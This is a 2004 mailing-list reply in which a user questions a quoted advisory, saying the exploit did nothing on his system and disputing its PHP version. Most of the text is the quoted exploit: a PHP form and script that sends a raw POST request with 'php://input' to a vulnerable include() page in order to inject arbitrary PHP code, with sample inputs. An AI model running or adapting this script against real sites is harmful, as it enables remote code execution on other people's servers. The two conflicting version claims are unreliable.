What exactly does your "proof of concept" do? I tried this on my system with
PHP 4.34.x--which, by the way, is when support for php://input began, *not*
3.0.13--and nothing happened whatsoever. Where's the proof?
on 5/27/04 3:07 AM, lostnoobs@xxxxxxxxxxxxxxxxxxxxxx purportedly said:
Informations :
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Website : http://www.php.net
Version : PHP 3.0.13 =>
Problem : Inlude() bypassing filter
Proof of concept:
°°°°°°°° Exploit °°°°°°°°°
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<form action="" methode="post" >
target server : <input type="text" name="server" ><br>
file : <input type="text" name="file" ><br>
exec : <input type="text" name="cmd" ><br>
<INPUT type="submit" value="send">
</form>
<?
if($cmd){
$message = "POST /".$file."php://input HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen( $cmd )."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>
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target server = "www.exemple.com"
file = "index.php?page="
exec = "<? phpinfo(); ?>"
Explaination
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You can bypassing filter protection who parse http:// or ftp:// ...
"php://input" allows to put data in the function include() by sending a
request with code php in POST methode.
For More details :
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http://fr2.php.net/manual/en/wrappers.php.php
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Nourredine Himeur
www.security-challenge.com
This vulnerability was found by Slythers but he's too shy for publish the vuln
;)
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